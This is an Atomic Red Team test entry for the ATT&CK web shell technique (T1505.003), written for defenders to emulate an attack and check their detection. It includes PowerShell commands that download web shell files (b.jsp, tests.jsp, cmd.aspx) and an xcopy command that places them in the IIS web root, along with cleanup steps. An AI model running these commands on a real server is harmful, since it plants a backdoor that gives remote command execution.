T1505.003
Server Software Component: Web Shell
Description from ATT&CK
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. China Chopper Web shell client).(Citation: Lee 2013)
Atomic Tests
Atomic Test #1 - Web Shell Written to Disk
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Supported Platforms: windows
auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot |
| web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1505.003\src |
Attack Commands: Run with command_prompt!
1
2
xcopy /I /Y "#{web_shells}" #{web_shell_path}
Cleanup Commands:
1
2
3
4
del #{web_shell_path}\b.jsp /q >nul 2>&1
del #{web_shell_path}\tests.jsp /q >nul 2>&1
del #{web_shell_path}\cmd.aspx /q >nul 2>&1
Dependencies: Run with powershell!
Description: Web shell must exist on disk at specified location (#{web_shells})
Check Prereq Commands:
1
2
if (Test-Path "#{web_shells}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
5
New-Item -Type Directory "#{web_shells}" -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"